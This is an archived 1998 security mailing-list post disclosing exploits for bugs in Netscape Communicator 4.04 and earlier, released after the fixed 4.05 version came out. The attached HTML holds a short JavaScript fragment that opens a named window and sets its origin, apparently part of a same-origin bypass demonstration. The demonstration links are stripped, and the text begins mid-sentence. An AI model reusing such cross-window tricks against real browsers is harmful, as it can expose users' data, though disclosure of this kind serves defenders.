Communicator exploits

From: Fernand Portela (fernand.portelaat_private)
Date: Fri Apr 10 1998 - 05:06:08 PDT

    issues in Netscape Communicator. Since a fixed release (4.05) is now
    available to users, I think I can publish the exploits themselves.

    If you received this mail in Communicator 4.04 or previous (NN2.x and
    3.x are not vulnerable), simply click the links in the attached HTML
    document for a demonstration of the bugs.

    Fernand PORTELA                                               aka Nando
    fernand.portelaat_private                                nandoat_private
                                               http://www.mygale.org/~nando
    --------------C3265FC716C909831247B1CC

    <head>
    <script><!--
    function load_page() {
      w = window.open( '', 'prefs' );
      w.origin = window.document.URL;
    }
    //--></script>
    </head>
    for a demonstration of the first exploit.
    for a demonstration of the second exploit.

    --------------C3265FC716C909831247B1CC--